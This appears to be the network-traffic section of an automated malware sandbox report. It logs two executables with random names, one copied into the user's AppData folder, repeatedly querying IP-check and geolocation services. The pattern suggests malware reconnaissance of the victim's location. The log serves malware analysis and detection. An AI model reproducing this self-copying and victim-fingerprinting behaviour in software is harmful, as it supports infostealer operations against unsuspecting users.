                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.2.749732132.226.8.169807728C:\Users\user\AppData\Roaming\aoTiGLRa.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 5, 2024 18:51:21.708097935 CET127OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Dec 5, 2024 18:51:23.120934010 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:22 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.2.749733132.226.8.169807308C:\Users\user\Desktop\Ti5nuRV7y4.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 5, 2024 18:51:21.735888004 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 5, 2024 18:51:23.136339903 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:22 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          6192.168.2.749749132.226.8.169807308C:\Users\user\Desktop\Ti5nuRV7y4.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 5, 2024 18:51:24.953478098 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 5, 2024 18:51:26.367177010 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:26 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          7192.168.2.749750132.226.8.169807728C:\Users\user\AppData\Roaming\aoTiGLRa.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 5, 2024 18:51:24.956271887 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 5, 2024 18:51:26.362000942 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:26 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          8192.168.2.749758132.226.8.169807308C:\Users\user\Desktop\Ti5nuRV7y4.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 5, 2024 18:51:28.268332005 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 5, 2024 18:51:29.738684893 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:29 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          9192.168.2.749759132.226.8.169807728C:\Users\user\AppData\Roaming\aoTiGLRa.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 5, 2024 18:51:28.280100107 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 5, 2024 18:51:29.852705002 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:29 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          10192.168.2.749772132.226.8.169807308C:\Users\user\Desktop\Ti5nuRV7y4.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 5, 2024 18:51:31.566623926 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 5, 2024 18:51:32.983830929 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:32 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          11192.168.2.749773132.226.8.169807728C:\Users\user\AppData\Roaming\aoTiGLRa.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 5, 2024 18:51:31.660171032 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 5, 2024 18:51:33.077064991 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:32 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          12192.168.2.749781132.226.8.169807308C:\Users\user\Desktop\Ti5nuRV7y4.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 5, 2024 18:51:34.801732063 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 5, 2024 18:51:36.251034975 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:36 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          13192.168.2.749782132.226.8.169807728C:\Users\user\AppData\Roaming\aoTiGLRa.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 5, 2024 18:51:34.888676882 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 5, 2024 18:51:36.586668015 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:36 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          14192.168.2.749796132.226.8.169807728C:\Users\user\AppData\Roaming\aoTiGLRa.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 5, 2024 18:51:38.474967957 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 5, 2024 18:51:39.896976948 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:39 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          15192.168.2.749803132.226.8.169807728C:\Users\user\AppData\Roaming\aoTiGLRa.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 5, 2024 18:51:41.706737995 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 5, 2024 18:51:43.116957903 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:42 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.749705104.21.67.1524437308C:\Users\user\Desktop\Ti5nuRV7y4.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-05 17:51:12 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-12-05 17:51:12 UTC880INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:12 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 298495
                                                                                                                          Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=drnbCvGadRHs9Qt%2Fyokln4fNJJidjFaF%2FcCeCH%2FrjE4F12e6krGeGliQhKmP2k1Ns0AveNx3F0FQP0Nz25LIJAvqReorbBgzFFqDDhIkxcsfpiYHBzmpBvBfAwX4Lp3%2FY1M%2B11BW"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8ed5e2085eb6429e-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2068&min_rtt=1744&rtt_var=886&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1674311&cwnd=198&unsent_bytes=0&cid=fe636cd752142aba&ts=491&x=0"
                                                                                                                          2024-12-05 17:51:12 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.749707104.21.67.1524437308C:\Users\user\Desktop\Ti5nuRV7y4.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-05 17:51:14 UTC61OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2024-12-05 17:51:15 UTC884INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:14 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 298497
                                                                                                                          Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PFa4FUxNx8D1OJbWNf3VwE3xXEX41UfTNfmK1FvJre1jYrhMUIQ0MxPQr1%2BqaJTH8G0qFfUL52xdSj%2BZpQd9UB17CuU1%2Fv3WZ1umBekX7v%2B%2BG%2FMJQFq89WfO5oxjupN8m%2ByKUFth"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8ed5e21658bd8c72-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2232&min_rtt=2118&rtt_var=876&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1378659&cwnd=174&unsent_bytes=0&cid=1fa1fad02aa372f1&ts=480&x=0"
                                                                                                                          2024-12-05 17:51:15 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.749715104.21.67.1524437308C:\Users\user\Desktop\Ti5nuRV7y4.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-05 17:51:17 UTC61OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2024-12-05 17:51:18 UTC876INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:18 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 298501
                                                                                                                          Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ebX53HzmhYNOaT5hFKzuCMVzILqdR4EoRPUwPGdD7YVzOVtzp%2BDNUerseDRsP10HB3tJ54GZz2drOCG2m%2BEeNYaac8qn7LUipPe7G8c5zkI18wvA1q13cZglkwHso%2FfYvVDHCcNg"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8ed5e22aaebd41ef-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1773&min_rtt=1740&rtt_var=676&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1678160&cwnd=192&unsent_bytes=0&cid=0a981e3186b7e447&ts=472&x=0"
                                                                                                                          2024-12-05 17:51:18 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.749716104.21.67.1524437728C:\Users\user\AppData\Roaming\aoTiGLRa.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-05 17:51:19 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-12-05 17:51:19 UTC876INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:19 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 298502
                                                                                                                          Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q6s5SPI7xYBOtF4nfgxtkT2eqzQRGGXTFby72UiWfwf1xGWvt3w%2F3%2BIuSRE4VL2BVAX4JWS8KDbA0%2ByNyEF6DgQUPQH1kAjxLTBaKfhmGqNS6XzKlwZxEkKtbbaiV4gaeU5tZzuX"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8ed5e2313e2fc484-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
